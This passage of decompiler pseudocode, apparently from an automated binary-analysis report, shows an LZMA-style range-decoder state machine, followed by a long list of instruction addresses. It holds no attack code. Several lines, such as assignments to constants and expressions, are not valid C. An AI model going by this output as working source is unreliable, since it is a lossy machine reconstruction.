							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                  0x00000000
                                  0x00406f4a
                                  0x00406f4a
                                  0x00406f4e
                                  0x00407005
                                  0x00407008
                                  0x00407014
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x0040726a
                                  0x0040726a
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x004072e0
                                  0x004072e0
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072bb
                                  0x004072bb
                                  0x004072bf
                                  0x0040746e
                                  0x00000000
                                  0x0040746e
                                  0x004072cb
                                  0x004072d2
                                  0x004072da
                                  0x004072dd
                                  0x00000000
                                  0x004072dd
                                  0x00406f54
                                  0x00406f58
                                  0x00407499
                                  0x00407499
                                  0x0040749c
                                  0x004074a0
                                  0x004074a0
                                  0x00406f5e
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00407484
                                  0x0040748c
                                  0x00407493
                                  0x00407495
                                  0x00000000
                                  0x00407495
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00406fac
                                  0x00406fac
                                  0x00406fac
                                  0x00406a82
                                  0x00406a82
                                  0x00406a8b
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00000000
                                  0x00406a9c
                                  0x00000000
                                  0x00000000
                                  0x00406aa5
                                  0x00406aa8
                                  0x00406aab
                                  0x00406aaf
                                  0x00000000
                                  0x00000000
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406aba
                                  0x00406abb
                                  0x00406abe
                                  0x00406ac0
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac6
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad9
                                  0x00406aec
                                  0x00406aef
                                  0x00406afb
                                  0x00406b23
                                  0x00406b25
                                  0x00406b33
                                  0x00406b33
                                  0x00406b37
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b27
                                  0x00406b27
                                  0x00406b2a
                                  0x00406b2b
                                  0x00406b2b
                                  0x00000000
                                  0x00406b27
                                  0x00406b01
                                  0x00406b06
                                  0x00406b06
                                  0x00406b0f
                                  0x00406b17
                                  0x00406b1a
                                  0x00000000
                                  0x00406b20
                                  0x00406b20
                                  0x00000000
                                  0x00406b20
                                  0x00000000
                                  0x00406b3d
                                  0x00406b3d
                                  0x00406b41
                                  0x004073ed
                                  0x00000000
                                  0x004073ed
                                  0x00406b4a
                                  0x00406b5a
                                  0x00406b5d
                                  0x00406b60
                                  0x00406b60
                                  0x00406b60
                                  0x00406b63
                                  0x00406b67
                                  0x00000000
                                  0x00000000
                                  0x00406b69
                                  0x00406b6f
                                  0x00406b99
                                  0x00406b9f
                                  0x00406ba6
                                  0x00000000
                                  0x00406ba6
                                  0x00406b75
                                  0x00406b78
                                  0x00406b7d
                                  0x00406b7d
                                  0x00406b88
                                  0x00406b90
                                  0x00406b93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bd8
                                  0x00406bde
                                  0x00406be1
                                  0x00406bee
                                  0x00406bf6
                                  0x00000000
                                  0x00000000
                                  0x00406bad
                                  0x00406bad
                                  0x00406bb1
                                  0x004073fc
                                  0x00000000
                                  0x004073fc
                                  0x00406bbd
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bcb
                                  0x00406bce
                                  0x00406bd1
                                  0x00406bd6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bfe
                                  0x00406c00
                                  0x00406c03
                                  0x00406c74
                                  0x00406c77
                                  0x00406c7a
                                  0x00406c81
                                  0x00406c8b
                                  0x00000000
                                  0x00406c8b
                                  0x00406c05
                                  0x00406c09
                                  0x00406c0c
                                  0x00406c0e
                                  0x00406c11
                                  0x00406c14
                                  0x00406c16
                                  0x00406c19
                                  0x00406c1b
                                  0x00406c20
                                  0x00406c23
                                  0x00406c26
                                  0x00406c2a
                                  0x00406c31
                                  0x00406c34
                                  0x00406c3b
                                  0x00406c3f
                                  0x00406c47
                                  0x00406c47
                                  0x00406c47
                                  0x00406c41
                                  0x00406c41
                                  0x00406c41
                                  0x00406c36
                                  0x00406c36
                                  0x00406c36
                                  0x00406c4b
                                  0x00406c4e
                                  0x00406c6c
                                  0x00406c6e
                                  0x00000000
                                  0x00406c50
                                  0x00406c50
                                  0x00406c53
                                  0x00406c56
                                  0x00406c59
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5e
                                  0x00406c61
